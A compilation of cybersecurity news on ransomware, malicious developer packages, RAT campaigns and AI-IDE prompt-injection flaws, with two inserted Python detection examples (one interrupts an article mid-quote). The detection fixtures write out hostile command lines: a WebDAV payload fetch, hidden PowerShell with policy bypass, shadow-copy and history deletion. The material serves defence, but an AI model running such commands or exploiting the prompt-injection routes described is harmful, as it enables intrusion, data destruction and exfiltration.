“Current large language models (LLMs) simply do not enforce a security boundary between instructions and data inside a prompt,” said David C, NCSC technical director for Platforms Research. “Design protections need to therefore focus more on deterministic (non-LLM) safeguards that constrain the actions of the system, rather than just attempting to prevent malicious content reaching the LLM.”

STAC6565 Targets Canada in 80% of Attacks as Gold Blade Deploys QWCrypt Ransomware

Canadian organizations have emerged as the focus of a targeted cyber campaign orchestrated by a threat activity cluster known as STAC6565 . Cybersecurity company Sophos said it investigated almost 40 intrusions linked to the threat actor between February 2024 and August 2025. The campaign is assessed with high confidence to share overlaps with a hacking group known as Gold Blade , which is also tracked under the names Earth Kapre, RedCurl, and Red Wolf. The financially motivated threat actor is believed to be active since late 2018 , initially targeting entities in Russia, before expanding its focus to entities in Canada, Germany, Norway, Russia, Slovenia, Ukraine, the U.K., and the U.S.

The group has a history of using phishing emails to conduct commercial espionage. However, recent attack waves have found RedCurl to have engaged in ransomware attacks using a bespoke malware strain dubbed QWCrypt . One of the notable tools in the threat actor’s arsenal is RedLoader, which sends information about the infected host to a command-and-control (C2) server and executes PowerShell scripts to collect details related to the compromised Active Directory (AD) environment. “This campaign reflects an unusually narrow geographic focus for the group, with almost 80% of the attacks targeting Canadian organizations,” Sophos researcher Morgan Demboski said.

“Once focused primarily on cyber espionage, Gold Blade has evolved its activity into a hybrid operation that blends data theft with selective ransomware deployment via a custom locker named QWCrypt.” Other prominent targets include the U.S., Australia, and the U.K., with services, manufacturing, retail, technology, non-governmental organizations, and transportation sectors hit the hardest during the time period. The group is said to be operating under a “hack-for-hire” model, carrying out tailored intrusions on behalf of clients, while deploying ransomware on the side to monetize the intrusions. Although a 2020 report from Group-IB raised the possibility of it being a Russian-speaking group, there are currently no indications to confirm or deny this assessment. Describing RedCurl as a “professionalized operation,” Sophos said the threat actor stands apart from other cybercriminal groups owing to its ability to refine and evolve its tradecraft, as well as mount discreet extortion attacks.

That said, there is no evidence to suggest it’s state-sponsored or politically motivated. The cybersecurity company also pointed out that the operational tempo is marked by periods of no activity, followed by sudden spikes in attacks using improved tactics, indicating that the hacking group could be using the downtime to refresh its toolset. STAC6565 intrusions begin with spear-phishing emails targeting human resources (HR) personnel to trick them into opening malicious documents disguised as resumes or cover letters. Since at least November 2024, the activity has leveraged legitimate job search platforms like Indeed, JazzHR, and ADP WorkforceNow to upload the weaponized resumes as part of a job application process.

“As recruitment platforms enable HR staff to review all incoming resumes, hosting payloads on these platforms and delivering them via disposable email domains not only increases the likelihood that the documents will be opened but also evades detection by email-based protections,” Demboski explained. In one incident, a fake resume uploaded to Indeed has been found to redirect users to a booby-trapped URL that ultimately led to the deployment of QWCrypt ransomware by means of a RedLoader chain. At least three different RedLoader delivery sequences have been observed in September 2024, March/April 2025, and July 2025. Some aspects of the delivery chains were previously detailed by Huntress, eSentire, and Bitdefender.

The major change observed in July 2025 concerns the use of a ZIP archive that’s dropped by the bogus resume. Present within the archive is a Windows shortcut (LNK) that impersonates a PDF. The LNK file uses “rundll32.exe” to fetch a renamed version of “ADNotificationManager.exe” from a WebDAV server hosted behind a Cloudflare Workers domain. The attack then launches the legitimate Adobe executable to sideload the RedLoader DLL (named “srvcli.dll” or “netutils.dll”) from the same WebDAV path.

The DLL proceeds to connect to an external server to download and execute the second-stage payload, a standalone binary that’s responsible for connecting to a different server and retrieving the third-stage standalone executable alongside a malicious DAT file and a renamed 7-Zip file. Both stages rely on Microsoft’s Program Compatibility Assistant (“pcalua.exe”) for payload execution, an approach seen in previous campaigns as well. The only difference is that the format of the payloads transitioned in April 2025 to EXEs instead of DLLs. “The payload parses the malicious .dat file and checks internet connectivity. It then connects to another attacker-controlled C2 server to create and run a .bat script that automates system discovery,” Sophos said. “The script unpacks Sysinternals AD Explorer and runs commands to gather details such as host information, disks, processes, and installed antivirus (AV) products.” The results of the execution are packaged into an encrypted, password-protected 7-Zip archive and transferred to a WebDAV server controlled by the attacker. RedCurl has also been observed using RPivot, an open-source reverse proxy, and Chisel SOCKS5 for C2 communications. Another tool used in the attacks is a customized version of the Terminator tool that leverages a signed Zemana AntiMalware driver to kill antivirus-related processes via what’s called a Bring Your Own Vulnerable Driver (BYOVD) attack.

In at least one case in April 2025, the threat actors renamed both components (the Terminator tool and the driver) before distributing them via SMB shares to all servers in the victim environment. Sophos also noted that a majority of these attacks were detected and mitigated before the installation of QWCrypt. However, three of the attacks – one in April and two in July 2025 – led to a successful deployment. “In the April incident, the threat actors manually browsed and collected sensitive files, then paused activity for over five days before deploying the locker,” it added.

“This delay may suggest the attackers turned to ransomware after trying to monetize the data or failing to secure a buyer.” The QWCrypt deployment scripts are tailored to the target environment, often containing a victim-specific ID in the file names. The script, once launched, checks whether the Terminator service is running before taking steps to disable recovery and execute the ransomware on endpoint devices across the network, including the organization’s hypervisors. In the last stage, the script runs a cleanup batch script to delete existing shadow copies and every PowerShell console history file to inhibit forensic recovery. “Gold Blade’s abuse of recruitment platforms, cycles of dormancy and bursts, and continual refinement of delivery methods demonstrate a level of operational maturity not typically associated with financially motivated actors,” Sophos said.

“The group maintains a comprehensive and well-organized attack toolkit, including modified versions of open-source tooling and custom binaries to facilitate a multi-stage malware delivery chain.” The disclosure comes as Huntress said it has noticed a huge spike in ransomware attacks on hypervisors, jumping from 3% in the first half of the year to 25% so far in the second half, primarily driven by the Akira group. “Ransomware operators deploy ransomware payloads directly through hypervisors, bypassing traditional endpoint protections entirely. In some instances, attackers leverage built-in tools such as OpenSSL to perform encryption of the virtual machine volumes, avoiding the need to upload custom ransomware binaries,” wrote researchers Anna Pham, Ben Bernstein, and Dray Agha. “This shift underscores a growing and uncomfortable trend: attackers are targeting the infrastructure that controls all hosts, and with access to the hypervisor, adversaries dramatically amplify the impact of their intrusion.” Given the heightened focus of threat actors on hypervisors, it’s advised to use local ESXi accounts, enforce multi-factor authentication (MFA), implement a strong password policy, segregate the hypervisor’s management network from production and general user networks, deploy a jump box to audit admin access, limit access to the control plane, and restrict ESXi management interface access to specific administrative devices.


Researchers Find Malicious VS Code, Go, npm, and Rust Packages Stealing Developer Data

Cybersecurity researchers have discovered two new extensions on Microsoft Visual Studio Code (VS Code) Marketplace that are designed to infect developer machines with stealer malware. The VS Code extensions masquerade as a premium dark theme and an artificial intelligence (AI)-powered coding assistant, but, in actuality, harbor covert functionality to download additional payloads, take screenshots, and siphon data. The captured information is then sent to an attacker-controlled server. “Your code. Your emails. Your Slack DMs. Whatever’s on your screen, they’re seeing it too,” Koi Security’s Idan Dardikman said. “And that’s just the start. It also steals your WiFi passwords, reads your clipboard, and hijacks your browser sessions.” The names of the extensions are below:

- BigBlack.bitcoin-black (16 installs) - Removed by Microsoft on December 5, 2025
- BigBlack.codo-ai (25 installs) - Removed by Microsoft on December 8, 2025

Microsoft’s list of removed extensions from the Marketplace shows that the company also removed a third package named “BigBlack.mrbigblacktheme” from the same publisher for containing malware. Dardikman told The Hacker News that the extension also contained the same malware as the other two, but noted it caused no real-world impact as it was removed quickly. While “BigBlack.bitcoin-black” activates on every VS Code action, Codo AI embeds its malicious functionality within a working tool, thereby allowing it to bypass detection. Earlier versions of the extensions came with the ability to execute a PowerShell script to download a password-protected ZIP archive from an external server (“syn1112223334445556667778889990[.]org”) and extract from it the main payload using four different methods: Windows native Expand-Archive, .NET System.IO.Compression, DotNetZip, and 7-Zip (if installed).

That said, the attacker is said to have inadvertently shipped a version that created a visible PowerShell window and could have alerted the user. Subsequent iterations, however, have been found to hide the window and streamline the entire process by switching to a batch script that uses a curl command to download the executable and DLL. The executable is the legitimate Lightshot binary that’s used to load the rogue DLL (“Lightshot.dll”) via DLL hijacking, which proceeds to gather clipboard contents, a list of installed apps, running processes, desktop screenshots, stored Wi-Fi credentials, and detailed system information. It also launches Google Chrome and Microsoft Edge in headless mode to grab stored cookies and hijack user sessions.

“A developer could install what looks like a harmless theme or a useful AI tool, and within seconds their WiFi passwords, clipboard contents, and browser sessions are being exfiltrated to a remote server,” Dardikman said. The disclosure comes as Socket said it identified malicious packages across the Go, npm, and Rust ecosystems that are capable of harvesting sensitive data:

- Go packages named “github[.]com/bpoorman/uuid” and “github[.]com/bpoorman/uid” that have been available since 2021 and typosquat trusted UUID libraries (“github[.]com/google/uuid” and “github[.]com/pborman/uuid”) to exfiltrate data to a paste site called dpaste when an application explicitly invokes a supposed helper function named “valid” along with the information to be validated.
- A set of 420 unique npm packages published by a likely French-speaking threat actor that follows a consistent naming pattern including “elf-stats-*,” some of which contain code to execute a reverse shell and exfiltrate files to a Pipedream endpoint.
- A Rust crate named finch-rust, published by faceless, that impersonates the legitimate bioinformatics tool “finch” and serves as a loader for a malicious payload through a credential-stealing package known as “sha-rust” when a developer uses the library’s sketch serialization functionality.

“Finch-rust acts as a malware loader; it contains mostly legitimate code copied from the legitimate finch package but includes a single malicious line that loads and executes the sha-rust payload,” Socket researcher Kush Pandya said. “This separation of concerns makes detection harder: finch-rust looks benign in isolation, while sha-rust contains the actual malware.”
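Socket’s Go finding above is a classic near-miss: github.com/bpoorman/uuid is github.com/pborman/uuid with two letters swapped and one added, which is exactly what a plain “is this module on my allow list” check lets through. A build pipeline can instead compare every require entry in go.mod against the modules you actually mean to depend on, using an edit distance that counts an adjacent-character swap as a single edit. The following is an added example, not Socket’s tooling; the go.mod content is constructed, and the trusted list and distance thresholds are assumptions to tune for your own dependency set.

```python
"""Flag go.mod dependencies that are near-misses of trusted module paths.

Added example, not Socket's tooling. SAMPLE_GO_MOD is constructed; TRUSTED
and the distance thresholds are assumptions.
"""

TRUSTED = [
    "github.com/google/uuid",
    "github.com/pborman/uuid",
    "github.com/gofrs/uuid",
]

# Constructed go.mod. The two bpoorman paths are the ones Socket reported.
SAMPLE_GO_MOD = """\
module example.com/app

go 1.22

require (
\tgithub.com/google/uuid v1.6.0
\tgithub.com/bpoorman/uuid v1.2.1
\tgithub.com/bpoorman/uid v0.1.0 // indirect
\tgolang.org/x/crypto v0.31.0
)

require github.com/gofrs/uuid v4.4.0+incompatible
"""


def osa_distance(a: str, b: str) -> int:
    """Optimal string alignment distance: insert, delete, substitute, or
    swap two adjacent characters, each costing 1."""
    d = [[0] * (len(b) + 1) for _ in range(len(a) + 1)]
    for i in range(len(a) + 1):
        d[i][0] = i
    for j in range(len(b) + 1):
        d[0][j] = j
    for i in range(1, len(a) + 1):
        for j in range(1, len(b) + 1):
            cost = 0 if a[i - 1] == b[j - 1] else 1
            d[i][j] = min(d[i - 1][j] + 1, d[i][j - 1] + 1, d[i - 1][j - 1] + cost)
            if i > 1 and j > 1 and a[i - 1] == b[j - 2] and a[i - 2] == b[j - 1]:
                d[i][j] = min(d[i][j], d[i - 2][j - 2] + 1)   # transposition
    return d[len(a)][len(b)]


def parse_require(gomod: str) -> list:
    """Module paths from both block and single-line require directives."""
    mods, in_block = [], False
    for raw in gomod.splitlines():
        line = raw.split("//", 1)[0].strip()       # drop '// indirect' etc.
        if not line:
            continue
        if in_block:
            if line == ")":
                in_block = False
            else:
                mods.append(line.split()[0])
        elif line.startswith("require ("):
            in_block = True
        elif line.startswith("require "):
            mods.append(line.split()[1])
    return mods


def split_path(path: str):
    """'github.com/pborman/uuid' -> ('github.com', 'pborman', 'uuid')."""
    host, _, rest = path.partition("/")
    owner, _, repo = rest.partition("/")
    return host, owner, repo


def find_typosquats(gomod: str, trusted=TRUSTED, owner_max=2, repo_max=1) -> list:
    """Return (module, lookalike) for each require entry that is not in
    `trusted` but sits within the edit-distance thresholds of one on the
    same host. Owner and repo segments are compared separately so that a
    swap in the owner plus a dropped letter in the repo still registers."""
    hits = []
    for mod in parse_require(gomod):
        if mod in trusted:
            continue
        host, owner, repo = split_path(mod)
        best = None
        for cand in trusted:
            c_host, c_owner, c_repo = split_path(cand)
            if c_host != host:
                continue
            d_owner, d_repo = osa_distance(owner, c_owner), osa_distance(repo, c_repo)
            if d_owner <= owner_max and d_repo <= repo_max:
                if best is None or d_owner + d_repo < best[0]:
                    best = (d_owner + d_repo, cand)
        if best is not None:
            hits.append((mod, best[1]))
    return hits


if __name__ == "__main__":
    for mod, lookalike in find_typosquats(SAMPLE_GO_MOD):
        print(f"{mod} looks like {lookalike}")
```

Run it against the real go.mod in CI and fail the build on any hit; module paths with a major-version suffix (`/v5`) need the suffix stripped before comparison, which the example above does not do.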

Experts Confirm JS#SMUGGLER Uses Compromised Sites to Deploy NetSupport RAT

Cybersecurity researchers are calling attention to a new campaign dubbed JS#SMUGGLER that has been observed leveraging compromised websites as a distribution vector for a remote access trojan named NetSupport RAT. The attack chain, analyzed by Securonix, involves three main moving parts: an obfuscated JavaScript loader injected into a website, an HTML Application (HTA) that runs encrypted PowerShell stagers using “mshta.exe,” and a PowerShell payload that’s designed to download and execute the main malware. “NetSupport RAT enables full attacker control over the victim host, including remote desktop access, file operations, command execution, data theft, and proxy capabilities,” researchers Akshay Gaikwad, Shikha Sangwan, and Aaron Beardslee said. There is little evidence at this stage to tie the campaign to any known threat group or country.

The activity has been found to target enterprise users through compromised websites, indicative of a broad-strokes effort. The cybersecurity company described it as a multi-stage web-based malware operation that employs hidden iframes, obfuscated loaders, and layered script execution for malware deployment and remote control. In these attacks, silent redirects embedded into the infected websites act as a conduit for a heavily scrambled JavaScript loader (“phone.js”) retrieved from an external domain, which then profiles the device to determine whether to serve a full-screen iframe (when visiting from a mobile phone) or load another remote second-stage script (when visiting from a desktop). The invisible iframe is designed to direct the victim to a malicious URL.

The JavaScript loader incorporates a tracking mechanism to ensure that the malicious logic is fired only once and during the first visit, thereby minimizing the chances of detection. “This device-aware branching enables attackers to tailor the infection path, hide malicious activity from certain environments, and maximize their success rate by delivering platform-appropriate payloads while avoiding unnecessary exposure,” the researchers said. The remote script downloaded in the first stage of the attack lays the foundation by constructing at runtime a URL from which an HTA payload is downloaded and executed using “mshta.exe.” The HTA payload is another loader for a temporary PowerShell stager, which is written to disk, decrypted, and executed directly in memory to evade detection. Furthermore, the HTA file is run stealthily by disabling all visible window elements and minimizing the application at startup.

Once the decrypted payload is executed, it also takes steps to remove the PowerShell stager from disk and terminates itself to avoid leaving as much forensic trail as possible. The primary goal of the decrypted PowerShell payload is to retrieve and deploy NetSupport RAT, granting the attacker complete control over the compromised host. “The sophistication and layered evasion techniques strongly indicate an actively maintained, professional-grade malware framework,” Securonix said. “Defenders should deploy strong CSP enforcement, script monitoring, PowerShell logging, mshta.exe restrictions, and behavioral analytics to detect such attacks effectively.” Aaron Beardslee, manager of threat research at Securonix, told The Hacker News that the malware’s behavior was determined from dynamic analysis on the desktop side only and that the mobile side was not emulated.
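The RedLoader chain described earlier on this page (rundll32.exe fetching the sideloading host from WebDAV, pcalua.exe proxying the second and third stages, and the QWCrypt cleanup script deleting shadow copies and PowerShell console history) and the JS#SMUGGLER chain above (mshta.exe launching a PowerShell stager) share one property: every step is a signed Windows binary doing something it rarely does under a user session. The block below is an added example, not Sophos or Securonix code, of how those steps translate into process-creation rules. The events are constructed Sysmon-style records; the field names, paths, host name and the url.dll,OpenURL invocation are assumptions, not details taken from either report.

```python
"""Process-creation rules for the RedLoader/QWCrypt and JS#SMUGGLER chains.

Added example, not code from Sophos or Securonix. EVENTS are constructed
Sysmon-style records; field names, paths and command lines are assumptions.
"""
import re

EVENTS = [  # constructed sample telemetry; ids exist only to label results
    {"id": 1, "parent": r"C:\Windows\explorer.exe",
     "image": r"C:\Windows\System32\rundll32.exe",
     "cmdline": r"rundll32.exe shell32.dll,Control_RunDLL desk.cpl"},          # benign
    {"id": 2, "parent": r"C:\Windows\explorer.exe",
     "image": r"C:\Windows\System32\rundll32.exe",
     "cmdline": r"rundll32.exe url.dll,OpenURL \\cdn.example.invalid@SSL\DavWWWRoot\notify.exe"},
    {"id": 3, "parent": r"C:\Windows\System32\rundll32.exe",
     "image": r"C:\Windows\System32\pcalua.exe",
     "cmdline": r"pcalua.exe -a C:\Users\hr\AppData\Local\Temp\stage2.exe"},
    {"id": 4, "parent": r"C:\Windows\System32\mshta.exe",
     "image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
     "cmdline": r"powershell.exe -w hidden -ep bypass -File C:\Users\hr\AppData\Local\Temp\s.ps1"},
    {"id": 5, "parent": r"C:\Windows\explorer.exe",
     "image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
     "cmdline": r"powershell.exe -NoProfile"},                                    # benign
    {"id": 6, "parent": r"C:\Windows\System32\cmd.exe",
     "image": r"C:\Windows\System32\vssadmin.exe",
     "cmdline": r"vssadmin.exe delete shadows /all /quiet"},
    {"id": 7, "parent": r"C:\Windows\System32\cmd.exe",
     "image": r"C:\Windows\System32\cmd.exe",
     "cmdline": r'cmd.exe /c del /q "%APPDATA%\Microsoft\Windows\PowerShell\PSReadLine\ConsoleHost_history.txt"'},
]

# WebDAV paths surface in command lines as \\host@SSL\... or ...\DavWWWRoot\...
WEBDAV_UNC = re.compile(r"\\\\[\w.-]+@ssl\\|davwwwroot", re.I)
SCRIPT_HOSTS = {"powershell.exe", "pwsh.exe", "cmd.exe", "wscript.exe", "cscript.exe"}


def basename(path: str) -> str:
    """Lower-cased file name of a Windows path."""
    return path.rsplit("\\", 1)[-1].lower()


def shadow_copy_deletion(e) -> bool:
    """vssadmin or wmic removing Volume Shadow Copies (QWCrypt cleanup step)."""
    img, cmd = basename(e["image"]), e["cmdline"]
    return bool((img == "vssadmin.exe" and re.search(r"delete\s+shadows", cmd, re.I))
                or (img == "wmic.exe" and re.search(r"shadowcopy\s+delete", cmd, re.I)))


RULES = [
    # RedLoader: LNK -> rundll32.exe pulling the sideloading host from WebDAV
    ("rundll32_webdav_fetch",
     lambda e: basename(e["image"]) == "rundll32.exe" and WEBDAV_UNC.search(e["cmdline"])),
    # RedLoader: Program Compatibility Assistant used as an execution proxy (-a <target>)
    ("pcalua_proxy_execution",
     lambda e: basename(e["image"]) == "pcalua.exe" and re.search(r"\s-a\s", e["cmdline"], re.I)),
    # JS#SMUGGLER: HTA loader spawning the PowerShell stager
    ("mshta_spawns_script_host",
     lambda e: basename(e["parent"]) == "mshta.exe" and basename(e["image"]) in SCRIPT_HOSTS),
    # QWCrypt cleanup: shadow copies removed to inhibit recovery
    ("shadow_copy_deletion", shadow_copy_deletion),
    # QWCrypt cleanup: PowerShell console history wiped
    ("powershell_history_wipe",
     lambda e: "consolehost_history.txt" in e["cmdline"].lower()
               and re.search(r"\b(del|erase|remove-item|rm)\b", e["cmdline"], re.I)),
]


def evaluate(events) -> list:
    """Return (rule_name, event_id) for every event/rule pair that fires."""
    return [(name, e["id"]) for e in events for name, pred in RULES if bool(pred(e))]


if __name__ == "__main__":
    for name, eid in evaluate(EVENTS):
        print(f"event {eid}: {name}")
```

The rules are deliberately narrow (image name plus one distinctive argument or parent) so they can be pushed to an EDR as-is; what makes them useful against these campaigns is correlating several hits on one host within minutes, since a lone rundll32 or vssadmin event is noise in most estates.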

“Static analysis gave us the clues and indicators as to what happens when a mobile device visits an infected site, and that’s where we stopped since we don’t have a mobile test-bed in our lab,” Beardslee added. “This is something we would like to incorporate in the future, though.”

CHAMELEON#NET Delivers Formbook Malware

The disclosure comes weeks after the company also detailed another multi-stage malspam campaign dubbed CHAMELEON#NET that uses phishing emails to deliver Formbook, a keylogger and information stealer. The email messages are aimed at luring victims in the National Social Security Sector into downloading a seemingly harmless archive after entering their credentials on a bogus webmail portal designed for this purpose. “This campaign begins with a phishing email that tricks users into downloading a .BZ2 archive, initiating a multi-stage infection chain,” Sangwan said.

“The initial payload is a heavily obfuscated JavaScript file that acts as a dropper, leading to the execution of a complex VB.NET loader. This loader uses advanced reflection and a custom conditional XOR cipher to decrypt and execute its final payload, the Formbook RAT, entirely in memory.” Specifically, the JavaScript dropper decodes and writes to disk in the %TEMP% directory two additional JavaScript files:

- svchost.js, which drops a .NET loader executable dubbed DarkTortilla (“QNaZg.exe”), a crypter that’s often used to distribute next-stage payloads
- adobe.js, which drops a file named “PHat.jar,” an MSI installer package that exhibits similar behavior as “svchost.js”

In this campaign, the loader is configured to decrypt and execute an embedded DLL, the Formbook malware. Persistence is achieved by adding it to the Windows startup folder to ensure that it’s automatically launched upon a system reboot. Alternatively, it also manages persistence through the Windows Registry.

“The threat actors combine social engineering, heavy script obfuscation, and advanced .NET evasion techniques to successfully compromise targets,” Securonix said. “The use of a custom decryption routine followed by reflective loading allows the final payload to be executed in a fileless manner, significantly complicating detection and forensic analysis.”

⚡ Weekly Recap: USB Malware, React2Shell, WhatsApp Worms, AI IDE Bugs & More

It’s been a week of chaos in code and calm in headlines. A bug that broke the internet’s favorite framework, hackers chasing AI tools, fake apps stealing cash, and record-breaking cyberattacks — all within days. If you blink, you’ll miss how fast the threat map is changing. New flaws are being found, published, and exploited in hours instead of weeks.

AI-powered tools meant to help developers are quickly becoming new attack surfaces. Criminal groups are recycling old tricks with fresh disguises — fake apps, fake alerts, and fake trust. Meanwhile, defenders are racing to patch systems, block massive DDoS waves, and uncover spy campaigns hiding quietly inside networks. The fight is constant, the pace relentless.

For a deeper look at these stories, plus new cybersecurity tools and upcoming expert webinars, check out the full ThreatsDay Bulletin.

⚡ Threat of the Week

Max Severity React Flaw Comes Under Attack — A critical security flaw impacting React Server Components (RSC) has come under extensive exploitation within hours of public disclosure. The vulnerability, CVE-2025-55182 (CVSS score: 10.0), relates to a case of remote code execution that could be triggered by an unauthenticated attacker without requiring any special setup. It’s also tracked as React2Shell.

Amazon reported that it observed attack attempts originating from infrastructure associated with Chinese hacking groups like Earth Lamia and Jackpot Panda within hours of public disclosure of the flaw. Coalition, Fastly, GreyNoise, VulnCheck, and Wiz have also reported seeing exploitation efforts targeting the flaw, indicating that multiple threat actors are engaging in opportunistic attacks. The Shadowserver Foundation said it has detected 28,964 IP addresses vulnerable to the React2Shell flaw as of December 7, 2025, down from 77,664 on December 5, with approximately 10,100 located in the U.S., 3,200 in Germany, and 1,690 in China.

🔔 Top News

Over 30 Flaws in AI-Powered IDEs — Security researcher Ari Marzouk disclosed details of more than 30 security vulnerabilities in various artificial intelligence (AI)-powered Integrated Development Environments (IDEs) that combine prompt injection primitives with legitimate features to achieve data exfiltration and remote code execution. The vulnerabilities have been collectively dubbed IDEsaster. “All AI IDEs (and coding assistants that integrate with them) effectively ignore the base software (IDE) in their threat model,” Marzouk said. “They treat their features as inherently safe because they’ve been there for years. However, once you add AI agents that can act autonomously, the same features can be weaponized into data exfiltration and RCE primitives.” Patches have been released to address the issues, with Anthropic acknowledging the risk via a security warning.

Chinese Hackers Use BRICKSTORM to Target U.S. Entities — China-linked threat actors, including UNC5221 and Warp Panda, are using a backdoor dubbed BRICKSTORM to maintain long-term persistence on compromised systems, according to an advisory from the U.S. government.

“BRICKSTORM is a sophisticated backdoor for VMware vSphere and Windows environments,” the Cybersecurity and Infrastructure Security Agency (CISA) said. “BRICKSTORM enables cyber threat actors to maintain stealthy access and provides capabilities for initiation, persistence, and secure command-and-control.” The activity has once again revived concerns about China’s sustained ability to tunnel deeper into critical infrastructure and government agency networks undetected, often for extended periods. The attacks have also amplified enduring concerns about China’s cyber espionage activity, which has increasingly targeted edge networks and leveraged living-off-the-land techniques to fly under the radar.

GoldFactory Targets Southeast Asia with Bogus Banking Apps — Cybercriminals associated with a financially motivated group known as GoldFactory have been observed staging a fresh round of attacks targeting mobile users in Indonesia, Thailand, and Vietnam by impersonating government services. The activity, observed since October 2024, involves distributing modified banking applications that act as a conduit for Android malware. Group-IB said it has identified more than 300 unique samples of modified banking applications that have led to almost 2,200 infections in Indonesia. The infection chains involve the impersonation of government entities and trusted local brands and approaching prospective targets over the phone to trick them into installing malware by instructing them to click on a link sent on messaging apps like Zalo.

The links redirect the victims to fake landing pages that masquerade as Google Play Store app listings, resulting in the deployment of a remote access trojan like Gigabud, MMRat, or Remo, which surfaced earlier this year using the same tactics as GoldFactory. These droppers then pave the way for the main payload that abuses Android’s accessibility services to facilitate remote control. Cloudflare Blocks Record 29.7 Tbps DDoS Attack — Cloudflare detected and mitigated the largest ever distributed denial-of-service (DDoS) attack that measured at 29.7 terabits per second (Tbps). The activity originated from a DDoS botnet-for-hire known as AISURU, which has been linked to a number of hyper-volumetric DDoS attacks over the past year.

The attack lasted for 69 seconds. Cloudflare did not disclose the target of the attack. The botnet has prominently targeted telecommunication providers, gaming companies, hosting providers, and financial services. Also tackled by Cloudflare was a 14.1 Bpps (billion packets per second) DDoS attack from the same botnet.

AISURU is believed to be powered by a massive network comprising an estimated 1-4 million infected hosts worldwide. Brazil Hit by Banking Trojan Spread via WhatsApp Worm — Brazilian users are being targeted by various campaigns that leverage WhatsApp Web as a distribution vector for banking malware. While one campaign attributed to a threat actor known as Water Saci drops a Casbaneiro variant, another set of attacks has led to the deployment of the Astaroth banking trojan. Sophos is tracking the second cluster under the moniker STAC3150 since September 24, 2025.

“The lure delivers a ZIP archive that contains a malicious VBS or HTA file,” Sophos said. “When executed, this malicious file launches PowerShell to retrieve second-stage payloads, including a PowerShell or Python script that collects WhatsApp user data and, in later cases, an MSI installer that delivers the Astaroth malware.” Despite the tactical overlaps, it’s currently not clear if they are the work of the same threat actor. “In this particular campaign, the malware spreads through WhatsApp,” K7 Security Labs said. “Because the malicious file is sent by someone already in our contacts, we tend not to verify its authenticity the same way we would if it came from an unknown sender.

This trust in familiar contacts reduces our caution and increases the chances of the malware being opened and executed.”

🔥 Trending CVEs

Hackers act fast. They can use new bugs within hours. One missed update can cause a big breach. Here are this week’s most serious security flaws.

Check them, fix what matters first, and stay protected. This week’s list includes — CVE-2025-6389 (Sneeit Framework plugin), CVE-2025-66516 (Apache Tika), CVE-2025-55182 (React), CVE-2025-9491 (Microsoft Windows), CVE-2025-10155, CVE-2025-10156, CVE-2025-10157 (Picklescan), CVE-2025-48633, CVE-2025-48572 (Google Android), CVE-2025-11699 (nopCommerce), CVE-2025-64775 (Apache Struts), CVE-2025-59789 (Apache bRPC), CVE-2025-13751, CVE-2025-13086, CVE-2025-12106 (OpenVPN), CVE-2025-13658 (Industrial Video & Control Longwatch), CVE-2024-36424 (K7 Ultimate Security), CVE-2025-66412 (Angular), CVE-2025-13510 (Iskra iHUB and iHUB Lite), CVE-2025-13372, CVE-2025-64460 (Django), CVE-2025-13486 (Advanced Custom Fields: Extended plugin), CVE-2025-64772 (Sony INZONE Hub), CVE-2025-64983 (SwitchBot), CVE-2025-31649, CVE-2025-31361 (Dell ControlVault), CVE-2025-47151 (Entr’ouvert Lasso), CVE-2025-66373 (Akamai), CVE-2025-13654 (Duc), CVE-2025-13032 (Avast), CVE-2025-33211, CVE-2025-33201 (NVIDIA Triton), CVE-2025-66399 (Cacti), CVE-2025-20386, CVE-2025-20387 (Splunk), and CVE-2025-66476 (Vim for Windows).

📰 Around the Cyber World

Compromised USBs Used for Crypto Miner Delivery — An ongoing campaign has been observed using USB drives to infect other hosts and deploy cryptocurrency miners since September 2024. While a previous iteration of the campaign used malware families like DIRTYBULK and CUTFAIL, the latest version spotted by AhnLab employs a batch script to launch a dropper DLL that launches PrintMiner, which then installs additional payloads, including XMRig.

“The malware is hidden in a folder, and only a shortcut file named ‘USB Drive’ is visible,” AhnLab said. “When a user opens the shortcut file, they are able to see not only the malware but also the files belonging to the previous user, making it difficult for users to realize that they have been infected with malware.” The development comes as Cyble said it identified an active Linux-targeting campaign that deploys a Mirai-derived botnet codenamed V3G4 that’s paired with a stealthy, fileless-configured cryptocurrency miner. “Once active, the bot masquerades as systemd-logind, performs environment reconnaissance, conducts large-scale raw-socket SSH scanning, maintains persistent C2 communication, and ultimately launches a concealed XMRig-based Monero miner dynamically configured at runtime,” the company said.

Fake Cryptocurrency Investment Domain Seized — The U.S. Department of Justice’s (DoJ) Scam Center Task Force seized Tickmilleas[.]com, a website used by scammers at the Tai Chang scam compound (aka Casino Kosai) in the village of Kyaukhat, Burma, to target and defraud Americans through cryptocurrency investment fraud (CIF) scams. “The tickmilleas[.]com domain was disguised as a legitimate investment platform to trick victims into depositing their funds,” the DoJ said. “Victims who used the domain reported to the FBI that the site showed lucrative returns on what they believed to be their investments and displayed purported deposits made by scammers to the victims’ accounts when the scammers walked the victims through supposed trades.” In tandem, Meta removed approximately 2,000 accounts associated with the Tai Chang compound. The domain is also said to have redirected visitors to fraudulent apps hosted on Google Play Store and Apple App Store.

Several of these apps have since been taken down. In a related move, Cambodian officials raided a cyber scam compound in the country’s capital Phnom Penh and arrested 28 suspects. Of the 28 individuals detained, 27 are Vietnamese nationals, and one is Cambodian. Cyber scam compounds in Cambodia are shifting from the country’s western border with Thailand to the east, to locations near the Vietnamese border, according to Cyber Scam Monitor.

Portugal Modifies Cybercrime Law to Exempt Researchers — Portugal has amended its cybercrime law to establish a legal safe harbor for white hat security research, making hacking non-punishable under strict conditions, including identifying vulnerabilities aimed at improving cybersecurity through disclosure, not seeking any economic benefit, immediately reporting the vulnerability to the system owner, deleting any data obtained during the research period within 10 of the vulnerability being fixed, and not violating data privacy regulations like GDPR. Last November, Germany floated a draft law that provided similar protections to the research community when discovering and responsibly reporting security flaws to vendors. CastleRAT Malware Detailed — A remote access trojan called CastleRAT has been detected in the wild with two main builds: a Python version and a compiled C version. While both versions offer similar capabilities, Splunk said the C build is more powerful and can include extra features.

“The malware gathers basic system information, such as computer name, username, machine GUID, public IP address, and product/version details, which it then transmits to the C2 server,” the Cisco-owned company said. “Additionally, it can download and execute further files from the server and provides a remote shell, allowing an attacker to run commands on the compromised machine.” CastleRAT is attributed to a threat actor known as TAG-150. DoJ Indicts Brothers for Wiping 96 Government Databases — The DoJ indicted two Virginia brothers for allegedly conspiring to steal sensitive information and deleting 96 government databases. Muneeb and Sohaib Akhter, both 34, stole data and deleted databases minutes after they were fired from their contractor roles.

